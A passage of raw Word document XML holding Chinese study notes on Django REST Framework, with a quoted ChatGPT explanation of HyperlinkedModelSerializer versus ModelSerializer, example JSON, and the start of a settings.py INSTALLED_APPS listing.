      </w:r>
      <w:bookmarkEnd w:id="634"/>
    </w:p>
    <w:p w14:paraId="1209159D" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="018EE69B" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考教程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62316F1F" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00584C88">
        <w:t>https://blog.csdn.net/litaimin/article/details/122976825</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D80D58D" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728D46A1" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC02CD">
        <w:t>https://www.django.cn/course/show-20.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DB8879" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710F58B4" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CAEDEB" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008F164C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HyperlinkedModelSerializer </w:t>
      </w:r>
      <w:r w:rsidRPr="008F164C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008F164C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ModelSerializer </w:t>
      </w:r>
      <w:r w:rsidRPr="008F164C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的差异</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28164C61" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chatGPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回答：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CF063" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好的，让我更详细地解释一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HyperlinkedModelSerializer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ModelSerializer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的差异。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F0D4A" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104D8529" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>HyperlinkedModelSerializer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FA2EFE" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用超链接表示关系：在序列化输出中，相关模型的关系不是通过嵌套的方式表示，而是通过超链接表示。例如，如果一个用户属于一个组，那么输出中将包含指向该组资源的超链接而不是组的详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E9897D" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C3144" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AC1A9" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        "url": "http://example.com/users/1/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB4726F" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        "username": "john_doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896DC1F" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        "email": "john@example.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E877C43" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        "groups": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB6D881" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">            "http://example.com/groups/1/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C8F3F" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">            "http://example.com/groups/2/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C30618A" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671ADC6C" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C870DA7" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34238128" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ModelSerializer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511EABEE" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B69F7B" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用嵌套数据表示关系：在序列化输出中，相关模型的详细信息通过嵌套的方式直接包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>含在输出中。例如，如果一个用户属于一个组，那么输出中将包含组的详细信息而不是指向组资源的超链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910F93E" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3684E8" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359599C4" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738B3BE" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">            "id": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65545B0F" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">            "username": "john_doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703642E3" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">            "email": "john@example.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0E2A4" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">            "groups": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3A83C" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689ECFA" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> "url": "http://example.com/groups/1/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4454EADE" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "name": "Group 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C31B65" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFEB5E0" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29943774" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"url": "http://example.com/groups/2/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36203841" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "name": "Group 2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1AEAA9" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA90F17" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="008B3636" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB4B9F3" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3636">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4E7BE4" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F3A0CA" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总体而言，主要区别在于如何表示关联模型的信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HyperlinkedModelSerializer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用超链接，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ModelSerializer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接嵌套相关模型的详细信息。选择其中一个取决于你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设计偏好以及是否希望在输出中使用超链接进行导航。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C1962" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D68BDE0" w14:textId="186725E3" w:rsidR="00162DA7" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="635" w:name="_Toc159780065"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实践</w:t>
      </w:r>
      <w:bookmarkEnd w:id="635"/>
    </w:p>
    <w:p w14:paraId="133DE18E" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B47F064" w14:textId="0B4B68AE" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
      <w:r>
        <w:t>s.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02BA1A" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FFB80A" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D999D8" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>INSTALLED_APPS = [</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'user'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>由于涉及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>auth.User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的更改，需要放置在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>模块前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># 'csp',   # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>限制发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
